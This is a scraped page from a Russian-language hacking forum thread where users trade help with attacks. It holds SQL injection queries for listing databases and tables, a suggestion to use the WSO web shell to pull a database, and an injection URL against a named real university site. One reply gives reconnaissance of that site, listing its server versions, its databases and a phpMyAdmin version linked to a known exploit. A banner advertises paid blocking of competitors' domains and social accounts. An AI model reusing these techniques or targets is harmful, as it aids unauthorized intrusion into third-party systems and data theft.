УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 149 из 296

149

Опции темы

Поиск в этой теме

Опции просмотра

#1481

13.11.2016, 16:35

qqq1457

Guest

Сообщений: n/a

Провел на форуме:
8589

Репутация: 0

если в mysql

select schema_name from information_schema.schemata limit 0,1 - выводит названия бд далее limit 1,1 ; limit 2,1 и т д

select table_name from information_schema.tables where table_schema='название бд которую вывел в пред запросе'

или если не выводит в hex

select table_name from information_schema.tables where table_schema=0x002.....

/threads/43966/

#1482

14.11.2016, 02:40

hiderat

Guest

Сообщений: n/a

Провел на форуме:
3584

Репутация: 0

Подскажите как забрать базу sql если к ней нет доступа из инета?

Мож скриптик какой есть?

Provider=SQLOLEDB.1

Data Source=.\SQLEXPRESS

#1483

14.11.2016, 03:13

karkajoi

Guest

Сообщений: n/a

Провел на форуме:
96779

Репутация: 5

Цитата:

Сообщение от hiderat

hiderat said:
↑
Подскажите как забрать базу sql если к ней нет доступа из инета?
Мож скриптик какой есть?
Provider=SQLOLEDB.1
Data Source=.\SQLEXPRESS

Скрипт называется WebShell (WSO), только он работает локально. В нем есть функция подключения к бд

#1484

14.11.2016, 20:09

Octavian

Guest

Сообщений: n/a

Провел на форуме:
97114

Репутация: 24

Можно прочитать даныи фаил через скулю?прочитать?

http://icfi.ulim.md/blocks/db.php

http://icfi.ulim.md/alltopics.php?ca...,5,6,7,8,9+--+

#1485

15.11.2016, 00:15

EvilSQL

Guest

Сообщений: n/a

Провел на форуме:
8136

Репутация: 3

Цитата:

Сообщение от Octavian

Octavian said:
↑
Можно прочитать даныи фаил через скулю?прочитать?
http://icfi.ulim.md/blocks/db.php
http://icfi.ulim.md/alltopics.php?ca...,5,6,7,8,9+--+

нет прочитать нельзя.

Код:

Code:
Web Server:     Apache/2.2.22 (Ubuntu)
Powered-by:     PHP/5.3.10-1ubuntu3.18
Current DB:     icfi
Data Bases:     information_schema
                     icfi
                     test

http://icfi.ulim.md/phpmyadmin/
http://icfi.ulim.md/phpmyadmin/Documentation.html
phpMyAdmin 3.4.10.1
phpMyAdmin 3.3.x / 3.4.x - Local File Inclusion via XXE Injection (Metasploit)

#1486

18.11.2016, 13:24

st55

Guest

Сообщений: n/a

Провел на форуме:
52834

Репутация: 47

Столкнулся с небольшой проблемой при эксплуатации error-based инъекции. GET запрос лимитирован до 255 символов. Все доступные вектора больше этого лимита (короткие типа extractvalue, updatexml, bigint overflow - не работают). Подскажите пути решения проблемы.